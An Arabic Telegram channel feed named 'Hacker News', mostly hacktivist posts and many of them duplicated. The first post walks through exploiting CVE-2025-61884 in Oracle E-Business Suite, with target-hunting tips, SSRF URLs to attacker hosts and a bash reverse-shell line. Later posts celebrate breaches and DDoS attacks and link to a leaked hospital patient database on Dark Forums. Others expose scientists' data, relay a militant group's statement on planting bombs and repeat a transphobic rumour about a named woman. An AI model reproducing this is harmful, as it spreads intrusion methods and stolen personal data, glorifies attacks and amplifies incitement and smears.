ثغرة CVE-2025-61884 هي ثغرة أمنية خطيرة تؤثر على منتج Oracle E-Business Suite، وتحديدًا مكون Oracle Configurator، وتسمح لأي مهاجم غير مُصادق له عبر الشبكة (HTTP) بتنفيذ هجمات تزوير الطلب من جانب الخادم SSRF للوصول للأنظمة الداخلية وسرقة بيانات حساسة.
نظام Oracle E-Business Suite (غالبًا يُختصر EBS أو E-Biz) هو نظام متكامل لإدارة موارد المؤسسات (ERP) طورته شركة أوراكل. يوفّر حلولًا شاملة لإدارة المحاسبة، المخزون، الموارد البشرية، سلسلة التوريد، الشراء، المبيعات، عمليات المصانع، وغيرها من العمليات التجارية والإدارية في المؤسسات المتوسطة والكبرى.
#HackerNews #Oracle #CVE_2025_61884
نظام Oracle E-Business Suite (غالبًا يُختصر EBS أو E-Biz) هو نظام متكامل لإدارة موارد المؤسسات (ERP) طورته شركة أوراكل. يوفّر حلولًا شاملة لإدارة المحاسبة، المخزون، الموارد البشرية، سلسلة التوريد، الشراء، المبيعات، عمليات المصانع، وغيرها من العمليات التجارية والإدارية في المؤسسات المتوسطة والكبرى.
#HackerNews #Oracle #CVE_2025_61884
❤🔥12❤4
Hacker News
ثغرة CVE-2025-61884 هي ثغرة أمنية خطيرة تؤثر على منتج Oracle E-Business Suite، وتحديدًا مكون Oracle Configurator، وتسمح لأي مهاجم غير مُصادق له عبر الشبكة (HTTP) بتنفيذ هجمات تزوير الطلب من جانب الخادم SSRF للوصول للأنظمة الداخلية وسرقة بيانات حساسة. نظام…
تفاصيل الثغرة
النظام المتأثر: Oracle E-Business Suite (الإصدارات من 12.2.3 حتى 12.2.14).
المكون المستهدف: Oracle Configurator، نقطة النهاية /OA_HTML/configurator/UiServlet.
نوع الثغرة: Server-Side Request Forgery (SSRF) – أي أن التطبيق يسمح للمهاجم بجعل الخادم يرسل طلبات لشبكة داخلية أو خدمات خارجية عبر معلمة الطلب (return_url).
كيف يستطيع المهاجم الوصول إلى Oracle E-Business Suite أو العثور عليه؟
كشف الأنظمة المكشوفة عبر الإنترنت:
يستخدم المهاجم محركات بحث مثل Shodan أو Censys برموز وتصنيفات مثل http.title:"Oracle E-Business Suite" أو كشف صفحات الويب باسم "OA_HTML" أو "Self Service".
أحيانًا يكفي البحث عن عناوين مثل:
فحص البورتات الشائعة:
غالبًا ما تُنشر صفحات تسجيل الدخول EBS على منافذ 8000 و 8001 و 8080 و 4443 و 1521 وغيرها.
استغلال إفصاحات النظام (Error Messages, Banners):
قد تعرض صفحة الدخول أو الأخطاء تفاصيل عن الإصدار أو اسم التطبيق (Oracle Applications/Oracle E-Business Suite).
الفهارس والتسريبات:
قد تظهر عناوين الأنظمة المكشوفة من خلال فهارس البحث أو تسريبات بيانات الشركات.
محاولة الوصول عبر كلمات مرور افتراضية:
بعض المؤسسات تُبقي حسابات/خدمات بصلاحيات افتراضية دون تغيير كلمات المرور الأصلية.
طريقة الاستغلال: يكفي إرسال طلب HTTP إلى الرابط vulnerable يضم رابطًا خبيثًا في حقل return_url مثل:
فيقوم النظام بتنفيذ الطلب وإرجاع البيانات أو تنفيذ كود خبيث أحيانًا إذا تم دمج الثغرة مع طرق حقن أخرى.
النتيجة عند الاستغلال:
الوصول غير المصرح إلى بيانات حساسة من النظام أو الشبكة الداخلية.
في بعض السيناريوهات، يمكن توسعة الهجوم ليصبح تنفيذ أوامر عن بعد (RCE) من خلال حقن قوالب XSL أو هجمات CRLF.
ملخص عملي للسلوك التقني:
المهاجم يرسل رابط طلب HTTP مثل:
فيستجيب الخادم ويُنفذ الطلب، ما يسمح للمهاجم بتنفيذ هجمات داخلية أو تزوير مصادر البيانات أو الحصول على بيانات سرية.
في بعض الحالات يقوم المهاجم بدمج SSRF مع حقن قوالب XSL أو هجمات CRLF، فيصبح بإمكانه رفع web shell أو تنفيذ reverse shell عبر أوامر مثل:
#HackerNews #Oracle #CVE_2025_61884
النظام المتأثر: Oracle E-Business Suite (الإصدارات من 12.2.3 حتى 12.2.14).
المكون المستهدف: Oracle Configurator، نقطة النهاية /OA_HTML/configurator/UiServlet.
نوع الثغرة: Server-Side Request Forgery (SSRF) – أي أن التطبيق يسمح للمهاجم بجعل الخادم يرسل طلبات لشبكة داخلية أو خدمات خارجية عبر معلمة الطلب (return_url).
كيف يستطيع المهاجم الوصول إلى Oracle E-Business Suite أو العثور عليه؟
كشف الأنظمة المكشوفة عبر الإنترنت:
يستخدم المهاجم محركات بحث مثل Shodan أو Censys برموز وتصنيفات مثل http.title:"Oracle E-Business Suite" أو كشف صفحات الويب باسم "OA_HTML" أو "Self Service".
أحيانًا يكفي البحث عن عناوين مثل:
text
/OA_HTML
/OA_HTML/RF.jsp
/OA_HTML/AppsLocalLogin.jsp
فحص البورتات الشائعة:
غالبًا ما تُنشر صفحات تسجيل الدخول EBS على منافذ 8000 و 8001 و 8080 و 4443 و 1521 وغيرها.
استغلال إفصاحات النظام (Error Messages, Banners):
قد تعرض صفحة الدخول أو الأخطاء تفاصيل عن الإصدار أو اسم التطبيق (Oracle Applications/Oracle E-Business Suite).
الفهارس والتسريبات:
قد تظهر عناوين الأنظمة المكشوفة من خلال فهارس البحث أو تسريبات بيانات الشركات.
محاولة الوصول عبر كلمات مرور افتراضية:
بعض المؤسسات تُبقي حسابات/خدمات بصلاحيات افتراضية دون تغيير كلمات المرور الأصلية.
طريقة الاستغلال: يكفي إرسال طلب HTTP إلى الرابط vulnerable يضم رابطًا خبيثًا في حقل return_url مثل:
text
/OA_HTML/configurator/UiServlet?return_url=http://attacker.com/evil
فيقوم النظام بتنفيذ الطلب وإرجاع البيانات أو تنفيذ كود خبيث أحيانًا إذا تم دمج الثغرة مع طرق حقن أخرى.
النتيجة عند الاستغلال:
الوصول غير المصرح إلى بيانات حساسة من النظام أو الشبكة الداخلية.
في بعض السيناريوهات، يمكن توسعة الهجوم ليصبح تنفيذ أوامر عن بعد (RCE) من خلال حقن قوالب XSL أو هجمات CRLF.
ملخص عملي للسلوك التقني:
المهاجم يرسل رابط طلب HTTP مثل:
text
GET /OA_HTML/configurator/UiServlet?return_url=http://malicious-site.com/payload
فيستجيب الخادم ويُنفذ الطلب، ما يسمح للمهاجم بتنفيذ هجمات داخلية أو تزوير مصادر البيانات أو الحصول على بيانات سرية.
في بعض الحالات يقوم المهاجم بدمج SSRF مع حقن قوالب XSL أو هجمات CRLF، فيصبح بإمكانه رفع web shell أو تنفيذ reverse shell عبر أوامر مثل:
text
bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1
#HackerNews #Oracle #CVE_2025_61884
❤23🔥7⚡1
Media is too big
VIEW IN TELEGRAM
ISRAEL EXPOSED
إطلاق قاعدة بيانات بـ 920 جيجا لتوثيق جرائم حرب الاحتلال في غزة
#HackerNews #ISRAELEXPOSED
إطلاق قاعدة بيانات بـ 920 جيجا لتوثيق جرائم حرب الاحتلال في غزة
#HackerNews #ISRAELEXPOSED
❤21🔥11✍9👍6⚡2👌1
في سابقة هي الأولى من نوعها تمكن أحد السجناء في رومانيا من اختراق منصة إدارة السجون في البلاد ليقوم بتخفيف عقوبته والاستفادة من مزايا متعددة له ولأصدقائه.
وبحسب تقارير مختلفة في وسائل الإعلام الرومانية وبيان صادر عن اتحاد شرطة السجون الرومانية، وجد السجين "Aurel Z" طريقة لاختراق منصة إلكترونية تديرها الجمعية الوطنية للسجون عبر الأجهزة اللوحية المثبتة في مستشفى تابع لسجن مدينة "ديج" في منطقة ترانسيلفانيا، حيث يتم إرسال السجناء للعلاج ثم العودة لإكمال عقوبتهم في السجن.
المنصة الإلكترونية تمكن السجناء عبر حساباتهم من تقديم طلبات، وتخفيض أيام من عقوبتهم بأداء وظائف مختلفة، أو إيداع أموال في حساب مصرفي يمكنهم استخدامها لاحقًا لشراء سلع وخدمات معينة.
اكتشف السجين "Aurel Z" أنه بعد تسجيل الدخول إلى حسابه، كان بإمكانه تنفيذ إيماءات محددة على الجهاز اللوحي أو إساءة استخدام قائمة ابدأ ومنطقة الإشعارات لإرسال التطبيق المخصص للمساجين للخلفية والوصول إلى تطبيقات أخرى تعمل على الجهاز، وكان أحد هذه التطبيقات عبارة عن صفحة متصفح تحتوي على عناصر أخرى مشتركة على نفس الشبكة.
#HackerNews
وبحسب تقارير مختلفة في وسائل الإعلام الرومانية وبيان صادر عن اتحاد شرطة السجون الرومانية، وجد السجين "Aurel Z" طريقة لاختراق منصة إلكترونية تديرها الجمعية الوطنية للسجون عبر الأجهزة اللوحية المثبتة في مستشفى تابع لسجن مدينة "ديج" في منطقة ترانسيلفانيا، حيث يتم إرسال السجناء للعلاج ثم العودة لإكمال عقوبتهم في السجن.
المنصة الإلكترونية تمكن السجناء عبر حساباتهم من تقديم طلبات، وتخفيض أيام من عقوبتهم بأداء وظائف مختلفة، أو إيداع أموال في حساب مصرفي يمكنهم استخدامها لاحقًا لشراء سلع وخدمات معينة.
اكتشف السجين "Aurel Z" أنه بعد تسجيل الدخول إلى حسابه، كان بإمكانه تنفيذ إيماءات محددة على الجهاز اللوحي أو إساءة استخدام قائمة ابدأ ومنطقة الإشعارات لإرسال التطبيق المخصص للمساجين للخلفية والوصول إلى تطبيقات أخرى تعمل على الجهاز، وكان أحد هذه التطبيقات عبارة عن صفحة متصفح تحتوي على عناصر أخرى مشتركة على نفس الشبكة.
#HackerNews
❤18💯2⚡1😇1
Hacker News
في سابقة هي الأولى من نوعها تمكن أحد السجناء في رومانيا من اختراق منصة إدارة السجون في البلاد ليقوم بتخفيف عقوبته والاستفادة من مزايا متعددة له ولأصدقائه. وبحسب تقارير مختلفة في وسائل الإعلام الرومانية وبيان صادر عن اتحاد شرطة السجون الرومانية، وجد السجين…
حيث عثر على سجلات وصول، وأخذ بيانات اعتماد مستخدم إداري سابق. الحساب الذي اختاره كان لمدير سابق لمستشفى سجن "ديج" والذي كان يتمتع بصلاحيات إدارية كاملة لتطبيق إدارة السجون. حيث بدأ بتعديل حسابه المالي وحسابات 15 من أصدقائه السجناء. وحذف النفقات السابقة، وتعديل ملاحظات حسن السلوك للاستفادة من الإفراج المبكر.
السجين بالغ كثيرا في تعديل حسابه المالي حيث كان ينفق مايعادل 2300 دولار شهريا، وهو مبلغ باهظ بالنسبة لشخص مسجون، حيث يبلغ ما يقرب من ثلاثة أضعاف الحد الأدنى للأجور في رومانيا، أما أحد أصدقائه فقد وصل حسابه لـ 1.15 مليون دولار.
ليقوم بنك CEC بدق جرس الانذار بعد ملاحظة المخالفات بين الأموال التي دخلت النظام والإجمالي الحالي والمبالغ المنفقة، ويبدأ التحقيق بعد فترة وجيزة، لتكتشفت السلطات عمليات الاختراق في بداية شهر أكتوبر لتنزع كامل الأجهزة اللوحية مؤقتًا، ويتبين أن عمليات اختراق طالت كذلك مجمعين آخرين للسجون في البلاد.
وذكرت وسائل إعلام رومانية أن أحد السجناء متهم بقضايا تتعلق بتكنولوجيا المعلومات قدم نفسه كعضو سابق في أنونيموس، كان وراء اكتشاف الخلل في نظام إدارة السجون وأخبر السجين "Aurel Z" بطريقة التلاعب والوصول لصلاحيات داخل المنصة، كما قدم معلومات عن طرق أخرى لاختراق تطبيق إدارة السجون مقابل تخفيف العقوبة.
#HackerNews
السجين بالغ كثيرا في تعديل حسابه المالي حيث كان ينفق مايعادل 2300 دولار شهريا، وهو مبلغ باهظ بالنسبة لشخص مسجون، حيث يبلغ ما يقرب من ثلاثة أضعاف الحد الأدنى للأجور في رومانيا، أما أحد أصدقائه فقد وصل حسابه لـ 1.15 مليون دولار.
ليقوم بنك CEC بدق جرس الانذار بعد ملاحظة المخالفات بين الأموال التي دخلت النظام والإجمالي الحالي والمبالغ المنفقة، ويبدأ التحقيق بعد فترة وجيزة، لتكتشفت السلطات عمليات الاختراق في بداية شهر أكتوبر لتنزع كامل الأجهزة اللوحية مؤقتًا، ويتبين أن عمليات اختراق طالت كذلك مجمعين آخرين للسجون في البلاد.
وذكرت وسائل إعلام رومانية أن أحد السجناء متهم بقضايا تتعلق بتكنولوجيا المعلومات قدم نفسه كعضو سابق في أنونيموس، كان وراء اكتشاف الخلل في نظام إدارة السجون وأخبر السجين "Aurel Z" بطريقة التلاعب والوصول لصلاحيات داخل المنصة، كما قدم معلومات عن طرق أخرى لاختراق تطبيق إدارة السجون مقابل تخفيف العقوبة.
#HackerNews
❤19🔥10
قام هاكر باختراق البوابة الضريبية الرسمية الفرنسية والدخول للملف الضريبي لزوجة الرئيس الفرنسي وتغيير اسم وجنس بريجيت ماكرون، حيث وضع في مكان الاسم "جان ميشيل ماكرون" والجنس "ذكر" ، وقال المستشار الخاص للرئيس الفرنسي تريستان بوم: دخلت السيدة ماكرون إلى حسابها الشخصي على موقع الضرائب فوجدت أن اسمها ليس بريجيت ماكرون، بل جان ميشيل ماكرون.
وأضاف مستشار الرئيس: تم التحقيق في مخاوف من وجود خلل برمجي، ولكن سرعان ما تبين أنه نتيجة تدخل متعمد، وأضاف أنه من المستحيل تغيير القسم الذي تم تعديله دون إذن المستخدم. وأفاد المسؤول الحكومي أن فريقًا من القراصنة "القساة" منح بريجيت ماكرون اسمًا ذكريًا على البوابة الضريبية الفرنسية الرسمية.
#HackerNews
وأضاف مستشار الرئيس: تم التحقيق في مخاوف من وجود خلل برمجي، ولكن سرعان ما تبين أنه نتيجة تدخل متعمد، وأضاف أنه من المستحيل تغيير القسم الذي تم تعديله دون إذن المستخدم. وأفاد المسؤول الحكومي أن فريقًا من القراصنة "القساة" منح بريجيت ماكرون اسمًا ذكريًا على البوابة الضريبية الفرنسية الرسمية.
وأثار جنس بريجيت الكثير من الجدل حيث يرى الكثيرين أن السيدة الأولى الفرنسية ولدت ذكرًا وفقًا للكثير من التقارير حيث كانت تحمل الاسم "جان ميشيل ترونيو" Jean Michel Trogneux وقامت بتغيير جنسها واسمها.
#HackerNews
1❤17👏7❤🔥3🤩3🆒3🎉2🤝2⚡1
تمكنت مجموعة الهاكرز "جبهة الإسناد السيبراني" من الوصول لملفات ووثائق ومخططات بالغة الأهمية تخص منظومة الدفاع الجوي الليزري Iron beam «الشعاع الحديدي» ووعدد من المشاريع العسكرية الأخرى من بينها الطائرة المسيّرة متعددة المهام "هرمز 900"، وصاروخ "سبايك"، ومشاريع عسكرية قيد التطوير.
نشرت المجموعة عدداً من الوثائق والصور قالت إنها حصلت عليها من خوادم تابعة لشركات صهيـونية عاملة في قطاع الدفاع، بينها شركة «مايا» المتخصصة في الصناعات العسكرية.
كما تضمّنت الملفات المسربة صوراً لعقود موقعة بين الجيش الصهيـوني وعدد من الجهات الدفاعية في أستراليا ودول أوروبية، ما يبن مدى اختراق البنية التحتية الدفاعية الصهيـونية.
تعد "MAYA" مسؤولة عن الأبحاث والتطوير لصالح شركات كبرى مثل "إلبيت سيستمز" و"رافائيل"، الذراعين الصناعي والتقني لوزارة الدفاع الصهـيونية.
#HackerNews #CyberIsnaadFront
الشعاع الحديدي هو نظام دفاع جوي بالليزر الموجه طورته شركة رافائيل وتم الكشف عنه في 11 فبراير 2014.ودخل الخدمة في الجيش الصهـيوني في 17 أغسطس 2020.صمم لتدمير الصواريخ قصيرة المدى والقذائف.
نشرت المجموعة عدداً من الوثائق والصور قالت إنها حصلت عليها من خوادم تابعة لشركات صهيـونية عاملة في قطاع الدفاع، بينها شركة «مايا» المتخصصة في الصناعات العسكرية.
كما تضمّنت الملفات المسربة صوراً لعقود موقعة بين الجيش الصهيـوني وعدد من الجهات الدفاعية في أستراليا ودول أوروبية، ما يبن مدى اختراق البنية التحتية الدفاعية الصهيـونية.
تعد "MAYA" مسؤولة عن الأبحاث والتطوير لصالح شركات كبرى مثل "إلبيت سيستمز" و"رافائيل"، الذراعين الصناعي والتقني لوزارة الدفاع الصهـيونية.
#HackerNews #CyberIsnaadFront
❤21❤🔥6🫡5✍3🔥1
Media is too big
VIEW IN TELEGRAM
🔥20🫡14❤13👍1
Media is too big
VIEW IN TELEGRAM
علماء تغذي ابتكاراتهم مجازر جيش الاحتلال الصهيوني
مجموعة حنظلة تكشف بيانات وصور كبار العلماء والمهندسين في معهد وايزمان
#HackerNews #HandalaHack
مجموعة حنظلة تكشف بيانات وصور كبار العلماء والمهندسين في معهد وايزمان
لا سبيل للتخفي بعد الآن
#HackerNews #HandalaHack
❤15👍6🔥6❤🔥2
قائد ميداني في سرايا القدس بالضفة الغربية:
منذ بداية معركة طوفان الأقصى أعطت قيادة سرايا القدس في الضفة الغربية الإيعاز للأخوة المجاهدين ببدء عملية (حجب الرؤية) والتي استهدفت عيون العدو وطائراته المسيرة في كافة مدن الضفة الغربية.
خلال عملية حجب الرؤية تمكن مجاهدونا من التعامل مع مسيرات العدو في أجواء محافظات الضفة بالوسائط النارية المناسبة، وإدخال أسلحة جديدة إلى ميدان المواجهة.
الجزء الخفي من عملية (حجب الرؤية) تمكن جهاز الاستخبارات التابع لسرايا القدس بالضفة الغربية ، من استخراج معلومات قيمة من هذه المسيرات متمثل في احداثيات مواقع ومراكز القيادة والسيطرة وتحشدات العدو وبعض المواقع المستحدثة ومعلومات لا يمكن الافصاح عنها في هذه المرحلة.
كان لإستخراج هذه المعلومات وقع كبير على مسرح العمليات لكافة تشكيلات سرايا القدس في الضفة الغربية، متمثلاً بتنفيذ عدة عمليات واستهداف مواقع وحواجز ونقاط عسكرية للعدو، او نصب عبوات في مسارات الآليات العسكرية .
#HackerNews #سرايا_القدس
منذ بداية معركة طوفان الأقصى أعطت قيادة سرايا القدس في الضفة الغربية الإيعاز للأخوة المجاهدين ببدء عملية (حجب الرؤية) والتي استهدفت عيون العدو وطائراته المسيرة في كافة مدن الضفة الغربية.
خلال عملية حجب الرؤية تمكن مجاهدونا من التعامل مع مسيرات العدو في أجواء محافظات الضفة بالوسائط النارية المناسبة، وإدخال أسلحة جديدة إلى ميدان المواجهة.
الجزء الخفي من عملية (حجب الرؤية) تمكن جهاز الاستخبارات التابع لسرايا القدس بالضفة الغربية ، من استخراج معلومات قيمة من هذه المسيرات متمثل في احداثيات مواقع ومراكز القيادة والسيطرة وتحشدات العدو وبعض المواقع المستحدثة ومعلومات لا يمكن الافصاح عنها في هذه المرحلة.
كان لإستخراج هذه المعلومات وقع كبير على مسرح العمليات لكافة تشكيلات سرايا القدس في الضفة الغربية، متمثلاً بتنفيذ عدة عمليات واستهداف مواقع وحواجز ونقاط عسكرية للعدو، او نصب عبوات في مسارات الآليات العسكرية .
#HackerNews #سرايا_القدس
🫡20❤5⚡3❤🔥2
Hacker News
قائد ميداني في سرايا القدس بالضفة الغربية: منذ بداية معركة طوفان الأقصى أعطت قيادة سرايا القدس في الضفة الغربية الإيعاز للأخوة المجاهدين ببدء عملية (حجب الرؤية) والتي استهدفت عيون العدو وطائراته المسيرة في كافة مدن الضفة الغربية. خلال عملية حجب الرؤية تمكن…
إن كافة تشكيلاتنا العسكرية تواصل إيلام العدو عبر تكتيكات ميدانية جديدة حسب معطيات وظروف الميدان ،ونطمئن أبناء شعبنا ان قدراتنا بخير وبنادقنا ستبقى مشرعة في وجه الاحتلال النازي، وأن ساحات المواجهة ستبقى مشتعلة حتى زوال المحتل.
#HackerNews #سرايا_القدس
إن العمل العسكري في الضفة الغربية لن يتوقف، وعلى العدو أن ينتظر المزيد طالما استمرت سياسة الاغتيالات الجبانة والانتهاكات والجرائم بحق أبناء شعبنا من جنود وقطعان مستوطني العدو، وهذا ما نؤكده لأهلنا المرابطين أننا بإذن الله على قدرٍ من المسؤولية ونكمل المسير بكل إصرار وثبات حتى النصر، وأن وعد الله عز وجل بزوال كيانهم قد اقترب.
#HackerNews #سرايا_القدس
❤20❤🔥5
الأخبار والصور التي تصلنا من السودان يعجز اللسان عن وصفها مجازر و جرائم ترتكب الآن في حق المدنيين دون أي سبب، بعد حصار وتجويع طويل نفذته قوات الدعم السريع التابعة لكـلب الإمارات حميدتي في مدينة الفاشر ومدن وقرى كثيرة، ورائحة الموت تفوح في كل زاوية.
نتأسف بشدة لأن قوات حميدتي لا تمتلك بنية إلكترونية أو خوادم ليتم استهدافها، لكن صور المجرمين والجلادين ستأخذ طريقها نحو العدالة بإذن الله ولو بعد حين، ويجب أن تدفع دويلة الخمارات ثمن هذه الدماء البريئة، لأن بن زايد آل شيطان هو من يمول هذه الفتن في كل الدول العربية إرضاءًا لرغباته الشيطانية وإشباعًا لتعطشه لدماء الأبرياء.
#الفاشر_تحت_الإبادة
#الدعم_السريع_يبيد_السودانيين
#وقف_الإبادة_في_السودان
#الامارات_تمول_الارهاب
نتأسف بشدة لأن قوات حميدتي لا تمتلك بنية إلكترونية أو خوادم ليتم استهدافها، لكن صور المجرمين والجلادين ستأخذ طريقها نحو العدالة بإذن الله ولو بعد حين، ويجب أن تدفع دويلة الخمارات ثمن هذه الدماء البريئة، لأن بن زايد آل شيطان هو من يمول هذه الفتن في كل الدول العربية إرضاءًا لرغباته الشيطانية وإشباعًا لتعطشه لدماء الأبرياء.
#الفاشر_تحت_الإبادة
#الدعم_السريع_يبيد_السودانيين
#وقف_الإبادة_في_السودان
#الامارات_تمول_الارهاب
💔47❤9👍7🔥5⚡2😨2
تعرضت شركة التأمينات "ياس تكافل" التي يقع مقرها في الإمارات لعملية اختراق أدت للوصول لقاعدة بيانات تحتوي على أكثر من 450 ألف سطر من معلومات العملاء.
تتضمن المعلومات التي تم طرحها في منتدى التسريبات Dark Forums الأسماء الكاملة للعملاء، تاريخ الميلاد، وأرقام الهواتف، عناوين البريد الإلكتروني، وغيرها من البيانات.
#HackerNews
تتضمن المعلومات التي تم طرحها في منتدى التسريبات Dark Forums الأسماء الكاملة للعملاء، تاريخ الميلاد، وأرقام الهواتف، عناوين البريد الإلكتروني، وغيرها من البيانات.
تعمل ياس تكافل في مجال التأمينات الصحية والسفر والعمل والسيارات والتأمين على الحياة، لكنها لم تعمل أي تأمين لنفسها وزبائنها ضد عمليات الاختراق، وقبل شهر من الآن قام البنك المركزي بسحب الرخصة منها بسبب مخالفتها للعمل وفق قوانين التأمينات، ليزداد تعقيد وضع الشركة بعد عملية الاختراق الأخيرة.
#HackerNews
🔥10❤4⚡2👌1🫡1🆒1
تعرضت قبل قليل مجموعة مستشفيات أمينة للرعاية الصحية بالإمارات لعملية خرق للبيانات أدت لتسريب معلومات شخصية تم نشرها على منتدى التسريبات Dark Forums.
يتضمن التسريب معلومات شخصية مثل الأسماء الكاملة، وعناوين البريد الإلكتروني، وأرقام الهواتف. كما يتضمن بيانات تقنية وبيانات وصفية مثل عناوين IP للمستخدمين، ومعلومات المتصفح والجهاز (وكيل المستخدم)، البيانات التي تم سحبها تعود للفترة الزمنية من 6 نوفمبر 2023 إلى غاية اليوم 31 أكتوبر 2025.
#HackerNews
يتضمن التسريب معلومات شخصية مثل الأسماء الكاملة، وعناوين البريد الإلكتروني، وأرقام الهواتف. كما يتضمن بيانات تقنية وبيانات وصفية مثل عناوين IP للمستخدمين، ومعلومات المتصفح والجهاز (وكيل المستخدم)، البيانات التي تم سحبها تعود للفترة الزمنية من 6 نوفمبر 2023 إلى غاية اليوم 31 أكتوبر 2025.
مجموعة مستشفيات أمينة للرعاية الصحية هي مجموعة طبية متكاملة تأسست في إمارة عجمان وتضم مستشفى أمينة متعدد التخصصات، بالإضافة إلى مراكز طبية وصيدليات أخرى في مناطق مثل الشارقة. تهدف المجموعة إلى تقديم خدمات رعاية صحية عالية المستوى للمقيمين والزوار، من خلال الجمع بين أحدث التقنيات الطبية وفريق من المتخصصين متعددي اللغات ذوي الخبرة الدولية.
#HackerNews
❤🔥8❤2🆒2😱1😢1
Hacker News
تعرضت قبل قليل مجموعة مستشفيات أمينة للرعاية الصحية بالإمارات لعملية خرق للبيانات أدت لتسريب معلومات شخصية تم نشرها على منتدى التسريبات Dark Forums. يتضمن التسريب معلومات شخصية مثل الأسماء الكاملة، وعناوين البريد الإلكتروني، وأرقام الهواتف. كما يتضمن بيانات…
رابط التسريب على Dark Forums : https://darkforums.st/Thread-DATABASE-aminahospital-FULL-DBs-⭐️%EF%B8%8F
❤7👍7
تعرضت المواقع الإلكترونية وبوابات خدمات الحكومة الإماراتية لهجمات إلكترونية للحرمان من الخدمة، شنتها كل من مجموعتي الهاكرز KeymousPlus و Ghilan Legion وذلك بعد ثبوت تورط حكومة الإمارات في دعمها الواضح لقوات الدعم السريع التي ارتكبت مجازر مروعة بحق المدنيين في مدينة الفاشر السودانية.
ونفذت مجموعة الهاكرز KeymousPlus هجمات أصابت مواقع كل من بوابة حكومة الإمارات، وزارة الداخلية، وزارة الصحة ووقاية المجتمع، وزارة الموارد البشرية والتوطين، الهيئة الاتحادية للضرائب.
فيما شنت مجموعة Ghilan Legion على موقع وزارة الدفاع، والهيئة الاتحادية للضرائب، وزارة الطاقة والبنية التحتية، شركة الشارقة الوطنية للنفط، شركة الإمارات للطاقة النووية، وأرفقت روابط التحقق من موقع check-host للتأكد من توقف الوصول لهذه المواقع.
#HackerNews #Stand_With_Sudan
ونفذت مجموعة الهاكرز KeymousPlus هجمات أصابت مواقع كل من بوابة حكومة الإمارات، وزارة الداخلية، وزارة الصحة ووقاية المجتمع، وزارة الموارد البشرية والتوطين، الهيئة الاتحادية للضرائب.
فيما شنت مجموعة Ghilan Legion على موقع وزارة الدفاع، والهيئة الاتحادية للضرائب، وزارة الطاقة والبنية التحتية، شركة الشارقة الوطنية للنفط، شركة الإمارات للطاقة النووية، وأرفقت روابط التحقق من موقع check-host للتأكد من توقف الوصول لهذه المواقع.
#HackerNews #Stand_With_Sudan
❤13🔥9⚡3❤🔥2